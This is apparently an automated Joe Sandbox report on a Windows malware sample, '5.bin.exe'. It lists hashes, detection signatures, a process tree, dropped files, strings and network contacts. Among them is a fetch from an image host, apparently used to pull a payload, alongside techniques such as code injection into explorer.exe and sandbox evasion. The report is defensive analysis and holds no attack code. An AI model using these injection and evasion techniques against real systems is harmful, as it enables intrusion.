Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5.bin.exe

Overview

General Information

Sample Name:5.bin.exe
Analysis ID:1299636
MD5:53c1fa0286a21f9269f7c0dd5d6ddcaf
SHA1:07eecfd07af0a7a6758d3141e57fbb252364c6b2
SHA256:1341bd6193ea223c05566aaca13fc1152732b67af8344519d6efaaf9ab6ed5f4
Tags:89-23-96-203exe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Maps a DLL or memory area into another process
Writes to foreign memory regions
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
PE file contains section with special chars
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Extensive use of GetProcAddress (often used to hide API calls)
Allocates memory with a write watch (potentially for evading sandboxes)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
PE / OLE file has an invalid certificate
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 5.bin.exe (PID: 7140 cmdline: C:\Users\user\Desktop\5.bin.exe MD5: 53C1FA0286A21F9269F7C0DD5D6DDCAF)
    • Dashboard.exe (PID: 6280 cmdline: C:\Users\user\AppData\Roaming\msls31\Dashboard.exe MD5: 704925ECFDB24EF81190B82DE0E5453C)
      • cmd.exe (PID: 6864 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • explorer.exe (PID: 2172 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • WerFault.exe (PID: 5468 cmdline: C:\Windows\system32\WerFault.exe -u -p 2172 -s 516 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\vbgwfnAvira: detection malicious, Label: HEUR/AGEN.1319100
Source: C:\Users\user\AppData\Local\Temp\vbgwfnJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.26.8.237:443 -> 192.168.2.4:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.165.183.85:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.19.58.158:443 -> 192.168.2.4:49712 version: TLS 1.2
Source: 5.bin.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msvcr80.i386.pdb source: msvcr80.dll.0.dr
Source: Binary string: ntdll.pdb source: explorer.exe, 00000007.00000002.287770250.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.288117620.00000000031A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: UXCore.pdb0;p8 source: Dashboard.exe, 00000001.00000002.259802738.0000000070301000.00000020.00000001.01000000.00000006.sdmp, UXCore.dll.0.dr
Source: Binary string: wntdll.pdbUGP source: Dashboard.exe, 00000001.00000002.259471774.000000000278C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282932233.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282756977.00000000055C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: explorer.exe, 00000007.00000002.287770250.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.288117620.00000000031A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Dashboard.exe, 00000001.00000002.259471774.000000000278C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282932233.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282756977.00000000055C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Dashboard.pdb source: Dashboard.exe, Dashboard.exe, 00000001.00000000.255320025.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Dashboard.exe, 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Dashboard.exe.0.dr
Source: Binary string: UXCore.pdb source: Dashboard.exe, 00000001.00000002.259802738.0000000070301000.00000020.00000001.01000000.00000006.sdmp, UXCore.dll.0.dr
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewIP Address: 104.26.8.237 104.26.8.237
Source: Joe Sandbox ViewIP Address: 18.165.183.85 18.165.183.85
Source: Joe Sandbox ViewIP Address: 162.19.58.158 162.19.58.158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: Dashboard.exe, 00000001.00000002.259196928.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 5.bin.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Dashboard.exe, 00000001.00000002.259196928.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.co(m/D
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 5.bin.exeString found in binary or memory: http://evcs-aia.ws.symantec.com/evcs.cer0
Source: 5.bin.exeString found in binary or memory: http://evcs-crl.ws.symantec.com/evcs.crl0
Source: 5.bin.exeString found in binary or memory: http://evcs-ocsp.ws.symantec.com04
Source: Dashboard.exe.0.drString found in binary or memory: http://get.live.com/0
Source: Dashboard.exeString found in binary or memory: http://ie.search.msn.com/
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: 5.bin.exeString found in binary or memory: http://ocsp.thawte.com0
Source: Dashboard.exeString found in binary or memory: http://runonce.msn.com/?v=msgrv75
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
Source: 5.bin.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 5.bin.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 5.bin.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.0000000003877000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.00000000011DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmp, 5.bin.exeString found in binary or memory: http://www.symauth.com/cps0(
Source: 5.bin.exeString found in binary or memory: http://www.symauth.com/cps09
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: 5.bin.exeString found in binary or memory: http://www.symauth.com/rpa04
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownDNS traffic detected: queries for: doi.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WHHost: doi.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WHHost: www.doi.org
Source: global trafficHTTP traffic detected: GET /26Q0f9R/2870308898.png HTTP/1.1Connection: Keep-AliveUser-Agent: WHHost: i.ibb.co
Source: unknownHTTPS traffic detected: 104.26.8.237:443 -> 192.168.2.4:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.165.183.85:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.19.58.158:443 -> 192.168.2.4:49712 version: TLS 1.2
Source: Dashboard.exe, 00000001.00000002.259044715.00000000004EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_4168810a-3

System Summary

barindex
Source: vbgwfn.3.drStatic PE information: section name: ./9=
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2172 -s 516
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_0100CCC8 ExitWindowsEx,1_2_0100CCC8
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: String function: 0100880F appears 56 times
Source: 5.bin.exe, 00000000.00000000.220338383.00007FF61BA1B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLogTransport2.exe6 vs 5.bin.exe
Source: 5.bin.exeBinary or memory string: OriginalFilenameLogTransport2.exe6 vs 5.bin.exe
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: 5.bin.exeStatic PE information: invalid certificate
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\msls31\Dashboard.exe 8CC871EE8760A4658189528B4A5D8AFE9824F6A13FAAF1FE7EB56F2A3AD2D04E
Source: C:\Users\user\Desktop\5.bin.exeFile read: C:\Users\user\Desktop\5.bin.exeJump to behavior
Source: 5.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5.bin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\5.bin.exe C:\Users\user\Desktop\5.bin.exe
Source: C:\Users\user\Desktop\5.bin.exeProcess created: C:\Users\user\AppData\Roaming\msls31\Dashboard.exe C:\Users\user\AppData\Roaming\msls31\Dashboard.exe
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2172 -s 516
Source: C:\Users\user\Desktop\5.bin.exeProcess created: C:\Users\user\AppData\Roaming\msls31\Dashboard.exe C:\Users\user\AppData\Roaming\msls31\Dashboard.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_0100CC59 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_0100CC59
Source: C:\Users\user\Desktop\5.bin.exeFile created: C:\Users\user\AppData\Roaming\APUSQGIEIJNUJump to behavior
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeFile created: C:\Users\user\AppData\Local\Temp\8e9c51a2Jump to behavior
Source: classification engineClassification label: mal72.evad.winEXE@9/11@3/3
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_010095A3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z,__EH_prolog3,GetCommandLineW,CoCreateInstance,GetCurrentProcessId,SysFreeString,1_2_010095A3
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS opm_data_v2 ( domain varchar(25), subDomain varchar(25), key varchar(100), value TEXT, PRIMARY KEY (domain, subDomain, key) );
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS opm_data ( domain varchar(25), subDomain varchar(25), key varchar(100), value TEXT, PRIMARY KEY (domain, subDomain, key) );
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 5.bin.exe, 00000000.00000000.220271361.00007FF61B974000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2172
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4628:120:WilError_01
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_010047FF LoadResource,LockResource,SizeofResource,1_2_010047FF
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCommand line argument: WLXS\Dashboard1_2_0100769A
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCommand line argument: DashboardRes1_2_0100769A
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCommand line argument: 1.0.0.11_2_0100769A
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCommand line argument: DashboardLoc1_2_0100769A
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Users\user\Desktop\5.bin.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5.bin.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 5.bin.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: 5.bin.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
Source: 5.bin.exeStatic file information: File size 1863880 > 1048576
Source: 5.bin.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x122e00
Source: 5.bin.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msvcr80.i386.pdb source: msvcr80.dll.0.dr
Source: Binary string: ntdll.pdb source: explorer.exe, 00000007.00000002.287770250.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.288117620.00000000031A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: UXCore.pdb0;p8 source: Dashboard.exe, 00000001.00000002.259802738.0000000070301000.00000020.00000001.01000000.00000006.sdmp, UXCore.dll.0.dr
Source: Binary string: wntdll.pdbUGP source: Dashboard.exe, 00000001.00000002.259471774.000000000278C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282932233.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282756977.00000000055C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: explorer.exe, 00000007.00000002.287770250.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.288117620.00000000031A0000.00000004.00001000.00020000.00000000.sdmp
